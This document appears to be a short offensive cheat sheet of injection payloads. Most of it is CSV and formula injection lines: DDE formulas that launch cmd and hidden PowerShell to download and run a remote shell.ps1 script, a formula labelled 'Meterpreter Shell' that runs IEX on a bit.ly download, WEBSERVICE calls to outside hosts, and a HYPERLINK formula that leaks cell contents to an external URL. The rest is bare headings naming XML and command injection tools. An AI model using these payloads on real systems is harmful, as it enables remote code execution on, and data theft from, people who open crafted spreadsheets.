Injection

CSV Injection

Server-Side Spreadsheet Injection - Formula Injection to Remote Code Execution
Data Exfiltration via Formula Injection

PowerShell payload:

=cmd|'/c powershell.exe -w hidden $e=(New-Object System.Net.WebClient).DownloadString("http://bishopfox.com/shell.ps1"); powershell -e $e'!A1
+cmd|'/C echo|set /p="ACQAYwBtAGQAKQAgAHsACgAkAGMAIAA9ACAAaQBlAHgAIAAkAGMAbQBkACAAMgA+ACYAMQAgAHwAIABPAHUAdAAtAFMAdAByAGkA" >> C:\ProgramData\activePDF\Temp\a.enc'!A0
-cmd|'/C echo|set /p="ACQAYwBtAGQAKQAgAHsACgAkAGMAIAA9ACAAaQBlAHgAIAAkAGMAbQBkACAAMgA+ACYAMQAgAHwAIABPAHUAdAAtAFMAdAByAGkA" >> C:\ProgramData\activePDF\Temp\a.enc'!A0
@cmd|'/C echo|set /p="ACQAYwBtAGQAKQAgAHsACgAkAGMAIAA9ACAAaQBlAHgAIAAkAGMAbQBkACAAMgA+ACYAMQAgAHwAIABPAHUAdAAtAFMAdAByAGkA" >> C:\ProgramData\activePDF\Temp\a.enc'!A0
=DDE(server; file; item; mode)
=DDE("cmd";"/C calc";"__DdeLink_60_870516294")

Check Web Responses:

=WEBSERVICE(http://bishopfox.com
=WEBSERVICE(https://bishopfox.com)
=WEBSERVICE(http://dnstest.bishopfox.com)
=HYPERLINK("http://contextis.co.uk?leak="&A1&A2,"Error: please click for further information")

Newline character

%0A-3+3+cmd|' /C calc'!D2

Meterpreter Shell

=cmd|'/C powershell IEX(wget bit.ly/1X146m3)'!A0

XML Injection

Aid blind XPath injection vulnerabilities
Vulnerable Java web application
XML Schema, DTD, and Entity Attacks
Tool that implements the Golden SAML attack
A New Era of SSRF Exploiting URL Parser in Trending Programming Languages!
Use WSDL files to send SOAP Messages
Java RMI enumeration and attack tool

Command Injection

Command Injection Exploiter

Unicode

ZERO WIDTH SPACE